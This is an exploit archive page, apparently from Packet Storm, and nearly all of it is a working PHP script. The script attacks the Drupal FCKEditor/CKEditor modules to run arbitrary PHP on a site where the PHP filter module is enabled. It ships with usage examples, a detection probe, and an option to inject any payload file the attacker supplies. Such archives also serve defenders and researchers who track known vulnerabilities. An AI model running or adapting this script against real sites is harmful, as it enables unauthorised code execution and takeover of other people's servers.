what you don't know can hurt you

Drupal FCKEditor/CKEditor PHP Execution

Drupal FCKEditor/CKEditor PHP Execution
Posted Mar 24, 2012
Authored by Patroscan

Drupal FCKEditor/CKEditor module remote PHP code execution exploit.

tags | exploit, remote, php, code execution
MD5 | 9d9241613b87c0bc1d7c9664845a5980

Drupal FCKEditor/CKEditor PHP Execution

Change Mirror Download
<?php
# Exploit Title: Drupal FCKEditor/CKEditor module remote PHP execution
# Date: March 19, 2012
# Author: Patroscon
# Software Link: http://drupal.org/project/ckeditor, http://drupal.org/project/fckeditor
# Version: FCKEditor 6.x-2.2, CKEditor 6.x-1.8, CKEditor 7.x-1.6.
# Tested on: Linux, Windows
# Vendor Advisory: http://drupal.org/node/1482528


# Description
#
# It is possible to instruct FCKEditor and CKEditor module to pass text trough a chosen filter.
# If the PHP filter module is enabled, users can chose to run this filter on chosen code.
#
# See http://drupal.org/1482528

/*
* Patroscon has RISEN!
*
* Exploits SA-CONTRIB-2012-040 (http://drupal.org/node/1482528).
*
* Required: vulnerable site must also use PHP filter module.
* Required for Drupal 6 exploit: You must have access permission listed in advisory.
*
* Point to the Drupal root.
*
* Use php patroscon.php http://example.com/ [cookie] [payloadfile]
*
* example:
*
* To check if the site can be exploited: php patroscon.php http://example.com/
* If you need a cookie: php patroscon.php http://example.com/ 'SESSa6a82714802c2c37ba16036f1faf01d4=g6TYq0r2mT8wCTQTKiYl6x2lIdRL1H21Db5CbomcKqU'
*
* It's possible to provide a filename with PHP exploit code. It will be executed when detection was succesful. When you provide the payload file
* you must also provide a cookie argument. This may be a nonsense cookie.
*
* example:
*
* php patroscon.php http://example.com/ 'whatever' ./admin_sid.php
*
* Exploit code must be wrapped in <?php ?> tags. See admin_sid.php for an example.
*
*/

if (!isset($argv[1])) {
echo "You must give URL such as http://example.com/";
return;
}

$site = $argv[1];
$cookie = isset($argv[2]) ? $argv[2] : '';
$payloadfile = isset($argv[3]) ? $argv[3] : '';

$exploits = array(
'fckeditor' => array(
'path' => 'fckeditor/xss',
'pre' => 'filters[0]=php/0&text=',
),
'ckeditor v6' => array(
'path' => 'ckeditor/xss',
'pre' => 'filters[0]=php/0&text=',
),
'ckeditor v7' => array(
'path' => 'ckeditor/xss',
'pre' => 'filters[0]=aaa&textformat_filters=true&input_format=php_code&text=',
),
);

echo "\nWorking on $site";
foreach ($exploits as $editor => $exploit) {
echo "\n - $editor";
$url = $site . '/?q=' . urlencode($exploit['path']);
$result = post($url, $exploit['pre'] . urlencode("<?php echo base64_decode('cGF0cm9zY29uIGhhcyByaXNlbg=='); ?>"), $cookie);

switch ($result['info']['http_code']) {
case 200:
if ($result['content'] == 'patroscon has risen') {
echo "\n - exploitable";
if ($payloadfile) {
echo "\n - injecting payload";
$payload = file_get_contents($payloadfile);
$result = post($url, $exploit['pre'] . urlencode($payload), $cookie);
echo "\n\n********* Payload result [{$result['info']['http_code']}] ******************************************************************";
echo "\n" . $result['content'];
echo "\n********** End payload **************************************************************************";
}
echo "\n";
return;
}
else {
echo "\n - unable to execute PHP";
}
break;
case 404:
echo "\n - not installed";
break;
case 403:
echo "\n - access denied";
break;
default:
echo "\n - an unknown error occured.";
}
}

echo "\n";

function post($url, $fields, $cookie) {
$handle = curl_init($url);
if (!$handle) {
return;
}

curl_setopt_array($handle, array(
CURLOPT_POST => TRUE,
CURLOPT_POSTFIELDS => $fields,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_COOKIE => $cookie,
));

$result = curl_exec($handle);
$info = curl_getinfo($handle);

curl_close($handle);
return array('content' => $result, 'info' => $info);
}
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    11 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close